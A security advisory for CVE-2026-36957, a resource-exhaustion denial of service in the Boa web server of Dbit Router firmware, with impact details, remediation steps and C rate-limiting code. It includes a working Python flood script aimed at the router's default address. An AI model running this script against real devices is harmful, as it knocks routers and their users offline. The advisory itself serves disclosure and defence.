# CVE-2026-36957: Boa Web Server Denial of Service Vulnerability

## Vulnerability Overview

* **CVE ID**: CVE-2026-36957
* **Vulnerability Type**: Denial of Service (DoS) / CWE-400 (Uncontrolled Resource Consumption)
* **CVSS Score**: 7.5 (High)
* **Discoverer**: Kirubel Solomone
* **Release Date**: 2026-04-29
* **Description**: A vulnerability exists in the URI handler of the Boa web server shipped in Dbit Router firmware V1.0.0. By sending a large number of HTTP GET requests for non-existent URIs, an attacker can exhaust critical system resources (including file descriptors and memory buffers), leading to a kernel deadlock or system hang that renders the router management portal and all routing functions unavailable.

## Impact Scope

* **Vendor**: Shenzhen Dibit Network Equipment Co., Ltd.
* **Product**: Dbit Router
* **Affected Version**: V1.0.0
* **Attack Vector**: Network
* **Specific Impacts**:
  * Complete loss of the web management interface
  * Interruption of routing functionality
  * Manual reboot required to restore service
  * Network disruption for all connected devices

## Remediation Measures

1. Implement connection rate limiting on the Boa web server.
2. Add a watchdog timer to recover from deadlock states.
3. Limit the maximum number of concurrent connections per IP.

## Proof-of-Concept Code (POC)

```python
import requests
import threading

TARGET = "http://192.168.10.1"  # default management address of the router


def flood(i):
    # Each thread requests one non-existent URI; errors and timeouts are ignored.
    try:
        requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
    except requests.RequestException:
        pass


threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router is still responsive.")
```
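Remediation measures 1 and 3 above (request rate limiting and a per-IP cap on concurrent connections), as an added example in C that is not part of this advisory and not Boa's own code; the table size, bucket constants and function names are assumptions chosen for a router-class device with little memory:

```c
/* Added example, not Boa's code: per-client token-bucket rate limit plus a
 * per-IP concurrent-connection cap for a small embedded HTTP server.
 * Names and constants are assumptions sized for a router-class device. */
#include <stdint.h>

#define MAX_CLIENTS     64   /* fixed table: memory cannot grow under a flood */
#define BURST           20.0 /* requests one client may send at once */
#define REFILL_RATE     5.0  /* sustained requests per second per client */
#define MAX_CONN_PER_IP 4    /* sockets one client may hold open at a time */

struct client { uint32_t ip; double tokens; double last; int active; };
static struct client table[MAX_CLIENTS];  /* ip == 0 marks a free slot */

/* Find the slot for ip, take a free slot, or evict the least recently seen
 * client; whichever happens, the table never grows. */
static struct client *lookup(uint32_t ip, double now)
{
    struct client *victim = &table[0];
    for (int i = 0; i < MAX_CLIENTS; i++) {
        if (table[i].ip == ip) return &table[i];
        if (table[i].ip == 0) { victim = &table[i]; break; }
        if (table[i].last < victim->last) victim = &table[i];
    }
    victim->ip = ip; victim->tokens = BURST; victim->last = now; victim->active = 0;
    return victim;
}

/* Token bucket: 1 = serve the request, 0 = drop it before parsing the URI.
 * 'now' is the caller's clock in seconds so the logic can be tested offline. */
int rate_limit_allow(uint32_t ip, double now)
{
    struct client *c = lookup(ip, now);
    if (now > c->last) c->tokens += (now - c->last) * REFILL_RATE;
    if (c->tokens > BURST) c->tokens = BURST;
    c->last = now;
    if (c->tokens < 1.0) return 0;
    c->tokens -= 1.0;
    return 1;
}
/* Concurrency cap: call after accept(); close the socket when it returns 0. */
int conn_acquire(uint32_t ip, double now)
{
    struct client *c = lookup(ip, now);
    if (c->active >= MAX_CONN_PER_IP) return 0;
    c->active++;
    return 1;
}
/* Call when a connection closes so the client's slot is released. */
void conn_release(uint32_t ip, double now)
{
    struct client *c = lookup(ip, now);
    if (c->active > 0) c->active--;
}
```

Boa handles each request on a single-threaded event loop, so these checks belong right after `accept()` and before any URI parsing, which is the point the advisory identifies as the resource sink.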